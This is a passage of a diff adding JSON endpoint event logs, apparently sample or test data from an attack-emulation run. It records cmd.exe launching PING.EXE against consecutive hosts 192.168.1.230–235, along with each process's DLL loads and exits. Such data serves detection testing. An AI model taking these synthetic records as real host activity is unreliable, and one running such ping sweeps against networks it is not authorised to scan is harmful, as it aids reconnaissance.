"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573112140000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573112140000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573112140000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573112140000, + "unique_pid": 
"{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573112140000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573112140000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573112140000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573112140000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573112140000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573112140000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": 
"C:\\Windows\\System32\\mswsock.dll", + "pid": 6052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573112140000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" + }, + { + "event_type": "process", + "pid": 6052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573116830000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.230", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4244, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573116980000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573116980000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573116980000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573116980000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" + }, + { 
+ "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573116980000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573116980000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573116980000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573116980000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573116980000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573116980000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 
4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573116980000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573116980000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" + }, + { + "event_type": "process", + "pid": 4244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573121990000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-001055CE5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.231", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 560, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573122140000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573122140000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573122140000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" + }, + { + "event_type": "image_load", + "image_name": 
"kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573122140000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573122140000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573122140000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573122140000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573122140000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573122140000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 560, + "process_name": "PING.EXE", + 
"process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573122140000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573122140000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573122140000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" + }, + { + "event_type": "process", + "pid": 560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573126830000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-0010D5D05301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.232", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7088, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573126980000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573126980000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": 
"C:\\Windows\\System32\\ntdll.dll", + "pid": 7088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573126980000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573126980000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573126980000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573126980000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573126980000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573126980000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7088, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573126980000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573126980000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573126980000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573126980000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" + }, + { + "event_type": "process", + "pid": 7088, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573131990000, + "unique_pid": "{42FC7E13-CBC0-5C05-0000-001048D35301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.233", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5788, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573132140000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": 
"C:\\Windows\\System32\\PING.EXE", + "pid": 5788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573132140000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573132140000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573132140000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573132140000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573132140000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573132140000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5788, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573132140000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573132140000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573132140000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573132140000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573132140000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" + }, + { + "event_type": "process", + "pid": 5788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573136840000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-0010C4D55301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.234", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 360, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 
131883573136980000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 360, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573136980000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 360, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573136980000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 360, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573136980000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 360, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573136980000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 360, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573136980000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 360, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", 
+ "timestamp": 131883573136980000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 360, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573136980000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 360, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573136980000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 360, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573136980000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 360, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573136980000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 360, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573136980000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" + }, + { + "event_type": "process", + "pid": 360, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573141990000, + "unique_pid": "{42FC7E13-CBC1-5C05-0000-001038D85301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.235", + "event_type": "process", + "logon_id": 
217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3824, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573142200000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573142140000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573142140000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573142140000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573142140000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573142140000, + "unique_pid": 
"{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573142140000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573142140000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573142140000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573142140000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573142140000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3824, + "process_name": "PING.EXE", + "process_path": 